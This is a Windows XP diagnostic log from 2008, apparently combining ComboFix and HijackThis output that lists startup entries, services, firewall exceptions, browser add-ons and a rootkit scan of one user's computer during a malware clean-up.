C:\WINDOWS\system32\qhnhcfho.ini
C:\WINDOWS\system32\yntfdbjo.ini
D:\Casinos\VegasVilla_w.exe
D:\Old Drive D\!backups\bestodds\bestodds.tar.bz2
D:\Old Drive D\!backups\freechip\freechip.tar.bz2
D:\Old Drive D\Scripts\hotsex.exe
D:\Old Drive F\!Site Files Backup\gambling.tar.bz2
D:\x-psp-video-converter.doc
E:\convert.exe

.
((((((((((((((((((((((((( Files Created from 2008-03-10 to 2008-04-10 )))))))))))))))))))))))))))))))
.

2008-04-07 18:14 . 2008-04-07 18:14 <DIR> d-------- C:\WINDOWS\system32\Kaspersky Lab
2008-04-07 18:14 . 2008-04-07 18:14 <DIR> d-------- C:\WINDOWS\LastGood
2008-04-07 18:14 . 2008-04-07 18:14 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Kaspersky Lab
2008-04-07 15:07 . 2008-04-07 18:06 <DIR> d-------- C:\Program Files\SUPERAntiSpyware
2008-04-07 15:07 . 2008-04-07 15:07 <DIR> d-------- C:\Documents and Settings\tony\Application Data\SUPERAntiSpyware.com
2008-04-07 15:07 . 2008-04-07 15:07 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\SUPERAntiSpyware.com
2008-04-07 15:06 . 2008-04-07 15:06 <DIR> d-------- C:\Program Files\Common Files\Wise Installation Wizard
2008-03-22 13:56 . 2008-03-22 13:56 2,267 --a------ C:\dating.csv
2008-03-10 15:49 . 2008-03-10 15:49 <DIR> d-------- C:\Documents and Settings\tony\Application Data\acccore
2008-03-10 15:46 . 2008-03-10 15:46 <DIR> d-------- C:\Program Files\Common Files\AOL
2008-03-10 15:46 . 2008-03-10 15:48 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\AOL OCP
2008-03-10 15:46 . 2008-03-10 15:46 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\AOL
2008-03-10 15:45 . 2008-03-10 15:47 <DIR> d-------- C:\Program Files\AIM6
2008-03-10 15:45 . 2008-03-10 15:47 445 --ah----- C:\IPH.PH

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-04-10 03:00 --------- d-----w C:\Documents and Settings\tony\Application Data\Skype
2008-04-10 02:22 --------- d-----w C:\Documents and Settings\All Users\Application Data\Google Updater
2008-04-09 20:06 --------- d-----w C:\Documents and Settings\tony\Application Data\skypePM
2008-04-07 22:04 --------- d-----w C:\Program Files\Symantec AntiVirus
2008-04-07 22:04 --------- d-----w C:\Program Files\Microsoft AntiSpyware
2008-04-07 15:34 --------- d-----w C:\Program Files\Bifrost
2008-04-04 15:05 --------- d-----w C:\Documents and Settings\tony\Application Data\Azureus
2008-03-30 12:51 --------- d-----w C:\Program Files\Azureus
2008-03-29 17:02 --------- d-----w C:\Documents and Settings\tony\Application Data\mIRC
2008-03-29 13:03 --------- d-----w C:\Program Files\mIRC
2008-03-10 19:46 --------- d-----w C:\Program Files\Viewpoint
2008-03-10 19:46 --------- d-----w C:\Documents and Settings\All Users\Application Data\Viewpoint
2008-03-07 19:34 --------- d-----w C:\Program Files\LimeWire
2008-03-04 17:39 --------- d-----w C:\Documents and Settings\tony\Application Data\AdobeUM
2008-03-04 17:25 --------- d-----w C:\Program Files\GTrends Made Easy
2008-03-03 19:47 --------- d-----w C:\Documents and Settings\tony\Application Data\Good Keywords v2
2008-03-03 19:43 --------- d-----w C:\Program Files\Softnik Technologies
2008-02-18 17:21 --------- d-----w C:\Program Files\Azoogle
2008-02-10 15:26 --------- d-----w C:\Program Files\FriendBlasterPro
2008-02-09 15:20 20 ---h--w C:\Documents and Settings\All Users\Application Data\PKP_DLec.DAT
2008-02-09 15:20 20 ---h--w C:\Documents and Settings\All Users\Application Data\PKP_DLds.DAT
2008-02-05 15:40 14,163,419 ----a-w C:\klcodec370f.exe
2008-01-29 16:06 32 ----a-w C:\Documents and Settings\All Users\Application Data\ezsid.dat
2008-01-19 02:19 607,744 ----a-w C:\WINDOWS\system32\x264vfw.dll
2007-10-28 01:44 67,984 ----a-w C:\Documents and Settings\tony\Application Data\GDIPFONTCACHEV1.DAT
2007-07-04 13:57 4,096 ----a-w C:\Documents and Settings\tony\log.dat
2005-05-12 03:36 12,288 ----a-w C:\WINDOWS\Fonts\RandFont.dll
2005-03-26 17:43 16,140 ----a-w C:\WINDOWS\Fonts\Fonts\andes.zip
2004-03-11 17:27 40,960 ----a-w C:\Program Files\Uninstall_CDS.exe
2003-11-08 02:54 150 ---ha-w C:\Documents and Settings\tony\hpothb07.dat
.

((((((((((((((((((((((((((((( snapshot@2008-04-07_11.42.11.62 )))))))))))))))))))))))))))))))))))))))))
.
+ 2008-04-07 19:07:36 18,944 ----a-r C:\WINDOWS\Installer\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}\IconCDDCBBF13.exe
+ 2008-04-07 19:07:36 65,024 ----a-r C:\WINDOWS\Installer\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}\IconCDDCBBF15.exe
+ 2005-05-24 16:27:16 213,048 ----a-w C:\WINDOWS\system32\Kaspersky Lab\Kaspersky Online Scanner\kavss.dll
+ 2007-08-29 19:47:20 94,208 ----a-w C:\WINDOWS\system32\Kaspersky Lab\Kaspersky Online Scanner\kavuninstall.exe
+ 2007-08-29 19:49:54 950,272 ----a-w C:\WINDOWS\system32\Kaspersky Lab\Kaspersky Online Scanner\kavwebscan.dll
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MSMSGS"="C:\Program Files\Messenger\MSMSGS.exe" [2004-10-13 12:24 1694208]
"LDM"="C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BackWeb-8876480.exe" [2003-07-24 21:49 16384]
"Vidalia"="C:\Program Files\Vidalia Bundle\Vidalia\vidalia.exe" [ ]
"swg"="C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2007-09-09 15:15 68856]
"Skype"="C:\Program Files\Skype\Phone\Skype.exe" [2007-12-07 16:08 21686568]
"updateMgr"="C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" [2006-03-30 17:45 313472]
"Aim6"="C:\Program Files\AIM6\aim6.exe" [2008-01-03 12:15 50528]
"SUPERAntiSpyware"="C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe" [2008-02-29 16:03 1481968]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMan"="SOUNDMAN.EXE" [2002-07-09 08:50 46592 C:\WINDOWS\SOUNDMAN.EXE]
"EM_EXEC"="C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE" [2001-09-19 09:41 35328]
"Disc Detector"="C:\Program Files\Creative\ShareDLL\CtNotify.exe" [2001-12-25 14:00 191488]
"WINDVDPatch"="CTHELPER.EXE" [2002-07-02 05:56 24576 C:\WINDOWS\system32\CTHELPER.EXE]
"UpdReg"="C:\WINDOWS\UpdReg.EXE" [2000-05-11 01:00 90112]
"Jet Detection"="C:\Program Files\Creative\SBLive\PROGRAM\ADGJDet.exe" [2001-11-29 01:00 28672]
"CTStartup"="C:\Program Files\Creative\Splash Screen\CTEaxSpl.exe" [2001-12-20 01:00 28672]
"gcasServ"="C:\Program Files\Microsoft AntiSpyware\gcasServ.exe" [2005-06-24 15:24 473928]
"RegistryMechanic"="" []
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.5.0_10\bin\jusched.exe" [2006-11-09 16:07 49263]
"Instant Buzz Daemon"="C:\Program Files\Instant Buzz\IBDaemon.exe" [ ]
"ATICCC"="C:\Program Files\ATI Technologies\ATI.ACE\cli.exe" [2006-01-02 17:41 45056]
"NWEReboot"="" []
"NeroFilterCheck"="C:\WINDOWS\system32\NeroCheck.exe" [2001-07-09 11:50 155648]
"HP Software Update"="D:\programs\HP\HP Software Update\HPWuSchd2.exe" [2005-05-11 23:12 49152]
"QuickTime Task"="C:\Program Files\QuickTime\qttask.exe" [2006-09-01 15:57 282624]
"DPAgnt"="C:\Program Files\DigitalPersona\Bin\DPAgnt.exe" [2004-10-13 19:24 913408]
"NvCplDaemon"="C:\WINDOWS\system32\NvCpl.dll" [2007-04-19 13:26 7700480]
"nwiz"="nwiz.exe" [2007-04-19 13:26 1626112 C:\WINDOWS\system32\nwiz.exe]
"NvMediaCenter"="C:\WINDOWS\system32\NvMcTray.dll" [2007-04-19 13:26 86016]
"SpySweeperEnterprise"="C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeperUI.exe" [2006-04-19 18:06 1238528]
"ccApp"="c:\Program Files\Common Files\Symantec Shared\ccApp.exe" [2005-08-02 22:00 67184]
"vptray"="c:\PROGRA~1\SYMANT~1\VPTray.exe" [2005-08-18 13:50 120640]

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Adobe Reader Speed Launch.lnk - C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe [2005-09-23 23:05:26 29696]
Color Calibration.lnk - C:\Program Files\SEC\MagicTune 2.5\GammaTray.exe [2005-02-28 21:35:09 36864]
Event Reminder.lnk - D:\PrintMaster\PrintMaster 16\pmremind.exe [2004-01-20 12:10:38 339968]
Google Updater.lnk - C:\Program Files\Google\Google Updater\GoogleUpdater.exe [2007-09-09 15:15:15 126136]
HP Digital Imaging Monitor.lnk - D:\Programs\HP\Digital Imaging\bin\hpqtra08.exe [2005-05-11 23:23:26 282624]
HP Image Zone Fast Start.lnk - D:\Programs\HP\Digital Imaging\bin\hpqthb08.exe [2005-05-12 00:49:24 73728]
Logitech Desktop Messenger.lnk - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LDMConf.exe [2003-07-24 21:49:31 156160]
LUMIX Simple Viewer.lnk - C:\Program Files\Panasonic\LUMIXSimpleViewer\PhLeAutoRun.exe [2005-10-16 19:54:56 61440]
NkbMonitor.exe.lnk - C:\Program Files\Nikon\PictureProject\NkbMonitor.exe [2007-05-20 20:02:44 118784]

[hkey_local_machine\software\microsoft\windows\currentversion\explorer\shell executehooks]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"= C:\Program Files\SUPERAntiSpyware\SASSEH.DLL [2006-12-20 12:55 77824]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon]
C:\Program Files\SUPERAntiSpyware\SASWINLO.dll 2007-04-19 12:41 294912 C:\Program Files\SUPERAntiSpyware\SASWINLO.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\DPWLN ]
C:\WINDOWS\system32\DPWLEvHd.dll 2004-10-13 19:29 102400 C:\WINDOWS\system32\DPWLEvHd.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"msacm.l3acm"= l3codeca.acm
"VIDC.I263"= i263_32.drv
"msacm.ctmp3"= C:\WINDOWS\System32\ctmp3.acm
"vidc.LEAD"= LCODCCMP.DLL
"MSVideo8"= VfWWDM32.dll
"MSACM.MI-SC4"= MI-SC4.acm
"VIDC.wmv3"= wmv9vcm.dll
"msacm.ac3acm"= ac3acm.acm
"vidc.yv12"= yv12vfw.dll
"msacm.l3fhg"= mp3fhg.acm
"VIDC.X264"= x264vfw.dll
"VIDC.HFYU"= huffyuv.dll
"msacm.lameacm"= lameACM.acm
"msacm.divxa32"= divxa32.acm

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusDisableNotify"=dword:00000001
"AntiVirusOverride"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\Auth orizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"D:\\Utilities\\Trillian\\trillian.exe"=
"D:\\Utilities\\WS_FTP\\WS_FTP95.exe"=
"C:\\Program Files\\Logitech\\Desktop Messenger\\8876480\\Program\\backWeb-8876480.exe"=
"C:\\StubInstaller.exe"=
"C:\\Program Files\\Mozilla Firefox\\firefox.exe"=
"C:\\Program Files\\Real\\RealOne Player\\realplay.exe"=
"C:\\WINDOWS\\system32\\dpvsetup.exe"=
"C:\\WINDOWS\\system32\\rundll32.exe"=
"C:\\WINDOWS\\PCHealth\\HelpCtr\\Binaries\\helpctr.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpqtra08.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpqste08.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpofxm08.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hposfx08.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hposid01.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpqscnvw.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpqkygrp.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpqCopy.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpfccopy.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpzwiz01.exe"=
"D:\\Programs\\HP\\Digital Imaging\\Unload\\HpqPhUnl.exe"=
"D:\\Programs\\HP\\Digital Imaging\\Unload\\HpqDIA.exe"=
"D:\\Programs\\HP\\Digital Imaging\\bin\\hpoews01.exe"=
"D:\\babycam\\IPView Pro.exe"=
"C:\\Program Files\\Azureus\\Azureus.exe"=
"C:\\Program Files\\MSN Messenger\\msnmsgr.exe"=
"C:\\Program Files\\MSN Messenger\\livecall.exe"=
"C:\\Program Files\\mIRC\\mirc.exe"=
"C:\\Program Files\\LimeWire\\LimeWire.exe"=
"C:\\Program Files\\Common Files\\AOL\\Loader\\aolload.exe"=
"C:\\Program Files\\Skype\\Phone\\Skype.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\Glob allyOpenPorts\List]
"3389:TCP"= 3389:TCP:@xpsp2res.dll,-22009
"65534:TCP"= 65534:TCP:Limewire

R0 HPT371;HPT371;C:\WINDOWS\system32\DRIVERS\HPT371.sys [2002-08-01 14:01]
R0 hptpro;hptpro;C:\WINDOWS\system32\DRIVERS\hptpro.sys [2002-04-27 14:34]
R1 VIAPFD;VIAPFD;C:\WINDOWS\system32\Drivers\VIAPFD.SYS [2001-12-18 14:45]
R2 ONSIO;ONSIO;C:\WINDOWS\SYSTEM32\DRIVERS\ONSIO.SYS [1998-09-14 08:41]
R2 Viewpoint Manager Service;Viewpoint Manager Service;"C:\Program Files\Viewpoint\Common\ViewpointService.exe" [2007-01-04 17:38]
S0 SMPLSCSI;SMPLSCSI;C:\WINDOWS\system32\drivers\SMPLSCSI.SYS [1998-08-01 12:00]
S1 amdtools;AMD Special Tools Driver;C:\WINDOWS\system32\DRIVERS\amdtools.sys []
S3 dpK0Bx01;Fingerprint Reader Filter Driver;C:\WINDOWS\system32\DRIVERS\dpK0Bx01.sys [2004-08-04 17:58]
S3 dwusbdnt;dwusbdnt;C:\WINDOWS\system32\DRIVERS\dwusbdnt.sys [2002-05-24 11:52]
S3 scsiscan;SCSI Scanner Driver;C:\WINDOWS\system32\DRIVERS\scsiscan.sys [2001-08-17 13:53]
S3 TS Poster;Trackback Poster;"C:\Program Files\Trackback Spider\Poster Service.exe" [2007-05-28 18:01]
S3 UsbdpFP;Fingerprint Reader Class Driver;C:\WINDOWS\system32\DRIVERS\UsbdpFP.sys [2004-08-04 17:59]

.
Contents of the 'Scheduled Tasks' folder
"2008-03-30 00:32:00 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job"
- C:\Program Files\Apple Software Update\SoftwareUpdate.exe
"2008-04-10 00:47:25 C:\WINDOWS\Tasks\Symantec NetDetect.job"
- C:\Program Files\Symantec\LiveUpdate\NDETECT.EXE
.
**************************************************************************

catchme 0.3.1344 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2008-04-09 23:00:40
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Disc Detector = C:\Program Files\Creative\ShareDLL\CtNotify.exe?X???:???????????????E?@?Disc Detector?A????? ?A?? ????B?e!@???@???@?? C?????E?@?????????@?B???A????? ?A???????B???@?????P?????@?? ????????A~??????????@?6?????????????????B?????????????????????????????????r ?B
CTStartup = C:\Program Files\Creative\Splash Screen\CTEaxSpl.EXE /run???h??????s?????\?w? ?w???????w???w4???????.??w4???????4???TA?s4???????\'2???A~??A~????????\???\ ???????????U?A~??A~\???\???????P?`??????C@?\???\??????s????\??????s\???@'2? A??s@'2??C@?x???`|?w\?????@

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
Completion time: 2008-04-09 23:01:31
ComboFix-quarantined-files.txt 2008-04-10 03:01:10
ComboFix2.txt 2008-04-07 18:57:22
ComboFix3.txt 2008-04-07 15:42:28
Pre-Run: 3,963,228,160 bytes free
Post-Run: 3,895,046,144 bytes free
.
2008-03-13 16:02:33 --- E O F ---











HIJACK THIS
~~~~~~~~~~~

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:29:42 PM, on 4/9/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\DigitalPersona\Bin\DPWinLct.exe
c:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
c:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\CTsvcCDA.exe
c:\Program Files\Symantec AntiVirus\DefWatch.exe
C:\Program Files\DigitalPersona\Bin\DpHost.exe
C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
C:\WINDOWS\system32\nvsvc32.exe
c:\Program Files\Symantec AntiVirus\SavRoam.exe
C:\WINDOWS\System32\svchost.exe
c:\Program Files\Symantec AntiVirus\Rtvscan.exe
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\Program Files\Webroot\Enterprise\Spy Sweeper\CommAgent.exe
C:\WINDOWS\System32\MsPMSPSv.exe
C:\Program Files\DigitalPersona\Bin\DPFUSMgr.exe
C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeper.exe
C:\WINDOWS\system32\WgaTray.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\Creative\ShareDLL\CtNotify.exe
C:\WINDOWS\system32\CTHELPER.EXE
C:\Program Files\Creative\ShareDLL\MediaDet.exe
C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
C:\Program Files\Microsoft AntiSpyware\gcasDtServ.exe
D:\programs\HP\HP Software Update\HPWuSchd2.exe
C:\Program Files\DigitalPersona\Bin\DPAgnt.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeperUI.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\PROGRA~1\SYMANT~1\VPTray.exe
C:\Program Files\Messenger\MSMSGS.EXE
C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BackWeb-8876480.exe
C:\Program Files\AIM6\aim6.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\SEC\MagicTune 2.5\GammaTray.exe
C:\Program Files\Google\Google Updater\GoogleUpdater.exe
D:\Programs\HP\Digital Imaging\bin\hpqtra08.exe
D:\programs\HP\Digital Imaging\bin\hpqimzone.exe
C:\Program Files\Panasonic\LUMIXSimpleViewer\PhLeAutoRun.exe
D:\programs\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\AIM6\aolsoftware.exe
D:\programs\HP\Digital Imaging\Product Assistant\bin\hprblog.exe
C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\WINDOWS\system32\notepad.exe
C:\WINDOWS\explorer.exe
C:\WINDOWS\system32\msiexec.exe
C:\Program Files\Java\jre1.5.0_10\bin\jusched.exe
C:\Program Files\QuickTime\QTTask.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\Skype\Plugin Manager\skypePM.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Documents and Settings\tony\Desktop\HiJackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.1.615.5858\swg.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [EM_EXEC] C:\PROGRA~1\Logitech\MOUSEW~1\SYSTEM\EM_EXEC.EXE
O4 - HKLM\..\Run: [Disc Detector] C:\Program Files\Creative\ShareDLL\CtNotify.exe
O4 - HKLM\..\Run: [WINDVDPatch] CTHELPER.EXE
O4 - HKLM\..\Run: [UpdReg] C:\WINDOWS\UpdReg.EXE
O4 - HKLM\..\Run: [Jet Detection] "C:\Program Files\Creative\SBLive\PROGRAM\ADGJDet.exe"
O4 - HKLM\..\Run: [CTStartup] C:\Program Files\Creative\Splash Screen\CTEaxSpl.EXE /run
O4 - HKLM\..\Run: [gcasServ] "C:\Program Files\Microsoft AntiSpyware\gcasServ.exe"
O4 - HKLM\..\Run: [Instant Buzz Daemon] C:\Program Files\Instant Buzz\IBDaemon.exe
O4 - HKLM\..\Run: [ATICCC] "C:\Program Files\ATI Technologies\ATI.ACE\cli.exe" runtime -Delay
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [HP Software Update] D:\programs\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [DPAgnt] C:\Program Files\DigitalPersona\Bin\DPAgnt.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [SpySweeperEnterprise] "C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeperUI.exe" /StartInTray
O4 - HKLM\..\Run: [ccApp] "c:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [vptray] c:\PROGRA~1\SYMANT~1\VPTray.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\MSMSGS.EXE" /background
O4 - HKCU\..\Run: [LDM] C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BackWeb-8876480.exe
O4 - HKCU\..\Run: [Vidalia] "C:\Program Files\Vidalia Bundle\Vidalia\vidalia.exe"
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [updateMgr] "C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" AcRdB7_0_9 -reboot 1
O4 - HKCU\..\Run: [Aim6] "C:\Program Files\AIM6\aim6.exe" /d locale=en-US ee://aol/imApp
O4 - HKCU\..\Run: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Color Calibration.lnk = ?
O4 - Global Startup: Event Reminder.lnk = D:\PrintMaster\PrintMaster 16\pmremind.exe
O4 - Global Startup: Google Updater.lnk = C:\Program Files\Google\Google Updater\GoogleUpdater.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk = D:\Programs\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: HP Image Zone Fast Start.lnk = D:\Programs\HP\Digital Imaging\bin\hpqthb08.exe
O4 - Global Startup: Logitech Desktop Messenger.lnk = C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LDMConf.exe
O4 - Global Startup: LUMIX Simple Viewer.lnk = ?
O4 - Global Startup: NkbMonitor.exe.lnk = C:\Program Files\Nikon\PictureProject\NkbMonitor.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Sothink SWF Catcher - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O9 - Extra 'Tools' menuitem: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://www.kaspersky.com/kos/eng/par...an_unicode.cab
O16 - DPF: {5C6698D9-7BE4-4122-8EC5-291D84DBD4A0} (Facebook Photo Uploader 4 Control) - http://upload.facebook.com/controls/...oUploader3.cab
O16 - DPF: {5F8469B4-B055-49DD-83F7-62B522420ECC} (Facebook Photo Uploader Control) - http://upload.facebook.com/controls/...toUploader.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsu...?1126034224607
O16 - DPF: {6B78B13A-6E99-4588-8EAB-C2399B202022} (iVocalize Web Conference 4 Setup) - http://www.edc.inetcommunicator.net/iv4.cab
O16 - DPF: {CCA0B877-CB5E-4ADC-AD30-457C379512DD} (Gif89 Lite Class) - http://69.42.9.110/xplugLiteAL.cab
O16 - DPF: {F137B9BA-89EA-4B04-9C67-2074A9DF61FD} (Photo Upload Plugin Class) - http://costco.pnimedia.com/upload/ac...v2.0.0.10.cab?
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O20 - Winlogon Notify: !SASWinLogon - C:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O20 - Winlogon Notify: DPWLN - C:\WINDOWS\system32\DPWLEvHd.dll
O23 - Service: Adobe LM Service - Unknown owner - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - c:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - c:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - c:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
O23 - Service: Creative Service for CDROM Access - Creative Technology Ltd - C:\WINDOWS\System32\CTsvcCDA.exe
